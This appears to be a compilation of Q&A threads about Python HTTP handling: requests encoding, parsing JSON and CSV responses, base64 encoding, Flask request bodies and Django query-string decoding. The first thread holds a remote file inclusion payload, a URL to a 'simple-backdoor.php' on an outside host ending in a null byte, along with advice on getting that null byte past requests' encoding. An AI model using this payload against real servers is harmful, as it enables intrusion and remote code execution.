Note that the following pieces of code are used for a remote file inclusion exploit in a controlled environment (not doing anything malicious here).
I'm trying to perform a post request to a URL:
resp = requests.post("http://example.com/test/index.php",data=post_data,cookies=cookie,proxies=proxies,config={'encode_uri': False})
One of the data parameters is a URL which is used for file inclusion; at the end it has a null byte:
http://mysite.org/simple-backdoor.php%00
But requests re-encodes the null byte at the end, making it useless:
http%3A%2F%2Fmysite.org%2Fsimple-backdoor.php%2500
I tried appending config={'encode_uri': False}, but this results in the same behavior. Does anyone have a clue how to disable this encoding, or how to introduce a null byte character which gets encoded to %00?
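Requests v2.0.0 onwards doesn't have (and thus doesn't respect) encode_uri. It form-encodes data whenever data isn't a string.
Use an actual null character in the Python string (\x00) instead of the literal text %00, so that the encoder produces %00 itself, OR manually encode every component of data and pass the form data as a string.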
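To see the difference between the two inputs, here is a minimal sketch using the standard library's urllib.parse.urlencode, which, as far as I know, is what requests relies on to form-encode a dict passed as data. The parameter name url is made up for illustration.

```python
from urllib.parse import urlencode

# Hypothetical parameter name "url"; the value is the one from the question.
literal = urlencode({"url": "http://mysite.org/simple-backdoor.php%00"})
real_null = urlencode({"url": "http://mysite.org/simple-backdoor.php\x00"})

print(literal)    # the "%" itself is escaped as %25, so the suffix becomes %2500
print(real_null)  # the NUL character is escaped as %00
```

The second form is the one the answer recommends: put the real character in the string and let the encoder escape it once.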
I am working on a program that reads the content of a RESTful API from ImportIO. The connection works, and data is returned, but it's a jumbled mess. I'm trying to clean it to only return ASINs.
I have tried using the split method with a delimiter, with no success.
stuff = requests.get('https://data.import.io/extractor***')
stuff.content
I get the content, but I want to extract only the ASINs.
While .content gives you access to the raw bytes of the response payload, you will often want to convert them into a string using a character encoding such as UTF-8. The response will do that for you when you access .text.
response.text
Because the decoding of bytes to str requires an encoding scheme, requests will try to guess the encoding based on the response’s headers if you do not specify one. You can provide an explicit encoding by setting .encoding before accessing .text, for example response.encoding = 'utf-8'.
If you take a look at the response, you’ll see that it is actually serialized JSON content. To get a dictionary, you could take the str you retrieved from .text and deserialize it using json.loads(). However, a simpler way to accomplish this task is to use .json():
response.json()
The type of the return value of .json() is a dictionary, so you can access values in the object by key.
You can do a lot with status codes and message bodies. But, if you need more information, like metadata about the response itself, you’ll need to look at the response’s headers.
For More Info: https://realpython.com/python-requests/
What format is the returned information in? Typically RESTful APIs return data as JSON, so you will likely have luck parsing it as a JSON object.
https://realpython.com/python-requests/#content
stuff_dictionary = stuff.json()
With that, the returned content is loaded as a dictionary, and you will have a much easier time.
EDIT:
Since I don't have the full URL to test, I can't give an exact answer. Given the content type is CSV, using a pandas DataFrame is pretty easy. With a quick StackOverflow search, I found the following answer: https://stackoverflow.com/a/43312861/11530367
So I tried the following in the terminal and got a dataframe from it
from io import StringIO
import pandas as pd
pd.read_csv(StringIO("HI\r\ntest\r\n"))
So you should be able to perform the following
from io import StringIO
import pandas as pd
df = pd.read_csv(StringIO(stuff.text))  # StringIO needs str, not the bytes in stuff.content
If that doesn't work, consider dropping the first three bytes you have in your response: b'\xef\xbb\xbf'. Check the answer from Mark Tolonen to parse this.
After that, selecting the ASIN (your second column) from your dataframe should be easy.
asins = df.loc[:, 'ASIN']
asins_arr = asins.array
The response is the byte string of CSV content encoded in UTF-8. The first three escaped byte codes are a UTF-8-encoded BOM signature. So stuff.content.decode('utf-8-sig') should decode it. stuff.text may also work if the encoding was returned correctly in the response headers.
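A small sketch of that decoding step, using only the standard library. The sample bytes and the column names (Title, ASIN) are invented stand-ins for stuff.content, since the real response isn't shown.

```python
import csv
import io

# Hypothetical stand-in for stuff.content: UTF-8 CSV bytes that start with a BOM.
content = b"\xef\xbb\xbfTitle,ASIN\r\nWidget,B000000001\r\nGadget,B000000002\r\n"

text = content.decode("utf-8-sig")  # "utf-8-sig" drops the leading BOM if present
rows = csv.DictReader(io.StringIO(text, newline=""))
asins = [row["ASIN"] for row in rows]
print(asins)
```

Decoding with plain "utf-8" would leave the BOM glued to the first header name, which is why a lookup on the first column can fail unexpectedly.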
So I've got a Python application that is using requests.post to make a POST request with JSON headers, body info, etc.
Problem is that in my dictionary that gets sent as headers, I have a variable that often contains character groups like "%25" or "%2F", etc. I've seen this cause problems before if sent in body data, but that can be fixed by sending the body data as a string rather than a dictionary. Haven't figured out how to make this work with the headers though, as you can't simply delimit the parameters with an ampersand like in body data.
How do I make sure that my cookie value is not altered in the process of the post request?
For instance, headers :
Host : blahblah.com
Connection : Keep-Alive
Cookie : My sensitive string with special characters
etc.
Note : Nothing server-side can be changed. The python application is being used for hired pentesting services.
A common technique for sending data that gets mangled in transit is to encode it first, typically as base64.
Sender:
import base64
...
encoded_data = "base64:{}".format(base64.b64encode(data).decode("ascii"))  # data must be bytes
Receiver:
import base64
...
if encoded_data.startswith("base64:"):
    data = base64.b64decode(encoded_data.split(':', 1)[1])
I am writing a program (Python 3.5.2) that uses an HTTPSConnection to get a JSON object as a response. I have it working using some example code, but am not sure where a method comes from.
My question is this: In the code below, the decode('utf-8') method doesn't exist in the documentation at https://docs.python.org/3.4/library/http.client.html#http.client.HTTPResponse under "21.12.2. HTTPResponse Objects". How would I know that the return value from the method "response.read()" has the method "decode('utf-8')" available?
Do Python objects inherit from a base class like C# objects do or am I missing something?
http = HTTPSConnection(get_hostname(token))
http.request('GET', uri_path, headers=get_authorization_header(token))
response = http.getresponse()
print(response.status, response.reason)
feed = json.loads(response.read().decode('utf-8'))
Thank you for your help.
The read method of the response object always returns a byte string (in Python 3, which I presume you are using as you use the print function). The byte string does indeed have a decode method, so there should be no problem with this code. Of course it makes the assumption that the response is encoded in UTF-8, which may or may not be correct.
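On the inheritance question: every Python 3 class ultimately derives from object, and decode belongs to the built-in bytes type rather than to http.client, which is why it is documented under bytes. A quick check, with a literal byte string standing in for what response.read() returns:

```python
# Stand-in for response.read(), which returns bytes in Python 3.
body = b'{"ok": true}'

print(type(body).__mro__)       # (<class 'bytes'>, <class 'object'>)
print(hasattr(body, "decode"))  # True
print(body.decode("utf-8"))     # {"ok": true}
```

Calling type() or help() on a return value is usually the quickest way to find out which class's documentation to read.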
[Technical note: email is a very difficult medium to handle: messages can be made up of different parts, each of which is differently encoded. At least with web traffic you stand a chance of reading the Content-Type header's charset attribute to find the correct encoding].
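Reading the charset could look roughly like this. With http.client, response.headers is an email.message.Message subclass, so get_content_charset() is available on it; the decode_body helper and the sample header below are hypothetical and only serve the illustration.

```python
from email.message import Message

def decode_body(raw, headers, default="utf-8"):
    """Decode raw bytes using the charset from Content-Type, else a default."""
    charset = headers.get_content_charset() or default
    return raw.decode(charset)

# Hypothetical headers; with http.client you would pass response.headers instead.
headers = Message()
headers["Content-Type"] = "application/json; charset=iso-8859-1"

text = decode_body('{"name": "café"}'.encode("iso-8859-1"), headers)
print(text)
```

Falling back to UTF-8 when no charset is declared is a choice made for this sketch, not something the server guarantees.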
The request's content-type is application/json, but I want to get the request body bytes. Flask will auto convert the data to json. How do I get the request body?
You can get the non-form-related data by calling request.get_data(). You can get the parsed form data by accessing request.form and request.files.
However, the order in which you access these two will change what is returned from get_data. If you call it first, it will contain the full request body, including the raw form data. If you call it second, it will typically be empty, and form will be populated. If you want consistent behavior, call request.get_data(parse_form_data=True).
You can get the body parsed as JSON by using request.get_json(), but this does not happen automatically like your question suggests.
See the docs on dealing with request data for more information.
To stream the data rather than reading it all at once, access request.stream.
If you want the data as a string instead of bytes, use request.get_data(as_text=True). This will only work if the body is actually text, not binary, data.
Files in a FormData request can be accessed at request.files. From there you can select the file you included in the FormData, e.g. request.files['audio'].
So now if you want to access the actual bytes of the file, in our case 'audio' using .stream, you should make sure first that your cursor points to the first byte and not to the end of the file, in which case you will get empty bytes.
Hence, a good way to do it:
file = request.files['audio']
file.stream.seek(0)
audio = file.read()
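The effect of the cursor position can be seen without Flask at all. In this sketch io.BytesIO stands in for file.stream (an assumption for illustration; the payload bytes are made up):

```python
import io

# io.BytesIO stands in for file.stream here.
stream = io.BytesIO(b"fake audio bytes")

first = stream.read()   # consumes everything; the cursor is now at the end
second = stream.read()  # nothing left to read, so this is empty
stream.seek(0)          # rewind to the first byte
third = stream.read()   # the full content again

print(len(first), len(second), len(third))
```

If anything has already read from the upload before your code runs, the seek(0) call is what prevents the empty result.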
If the data is JSON, use request.get_json() to parse it.
I have a Django View that uses a query parameter to do some content filtering. Something like this:
/page/?filter=one+and+two
/page/?filter=one,or,two
I have noticed that Django converts the + to a space (request.GET.get('filter') returns one and two), and I'm OK with that. I just need to adjust the split() function I use in the View accordingly.
But...
When I try to test this View, and I call:
from django.test import Client
client = Client()
client.get('/page/', {'filter': 'one+and+two'})
request.GET.get('filter') returns one+and+two: with plus signs and no spaces. Why is this?
I would like to think that Client().get() mimics the browser behaviour, so what I would like to understand is why calling client.get('/page/', {'filter': 'one+and+two'}) is not like browsing to /page/?filter=one+and+two. For testing purposes it should be the same in my opinion, and in both cases the view should receive a consistent value for filter: be it with + or with spaces.
What I don't get is why there are two different behaviours.
The plusses in a query string are the normal and correct encoding for spaces. This is a historical artifact; the form value encoding for URLs differs ever so slightly from encoding other elements in the URL.
Django is responsible for decoding the query string back to key-value pairs; that decoding includes decoding the URL percent encoding, where a + is decoded to a space.
When using the test client, you pass in unencoded data, so you'd use:
client.get('/page/', {'filter': 'one and two'})
This is then encoded to a query string for you, and subsequently decoded again when you try and access the parameters.
This is because the test client (actually, RequestFactory) runs django.utils.http.urlencode on your data, resulting in filter=one%2Band%2Btwo. Similarly, if you were to use {'filter': 'one and two'}, it would be converted to filter=one+and+two, and would come into your view with spaces.
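The same round trip can be reproduced with the standard library's urllib.parse, which I'm assuming behaves like Django's encoder and decoder for this case (Django's urlencode is a wrapper around it):

```python
from urllib.parse import parse_qs, urlencode

# What the browser sends: "+" in a query string is decoded to a space.
print(parse_qs("filter=one+and+two"))  # {'filter': ['one and two']}

# Literal plus signs passed as data get escaped, so they survive decoding.
encoded = urlencode({"filter": "one+and+two"})
print(encoded)                         # filter=one%2Band%2Btwo
print(parse_qs(encoded))               # {'filter': ['one+and+two']}

# Passing the unencoded value gives the same result as the browser URL.
round_trip = parse_qs(urlencode({"filter": "one and two"}))
print(round_trip)                      # {'filter': ['one and two']}
```

So the two behaviours differ only because the browser URL is already encoded, while the dict given to the test client is treated as raw data.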
If you really absolutely must have the pluses in your query string, I believe it may be possible to manually override the query string with something like: client.get('/page/', QUERY_STRING='filter=one+and+two'), but that just seems unnecessary and ugly in my opinion.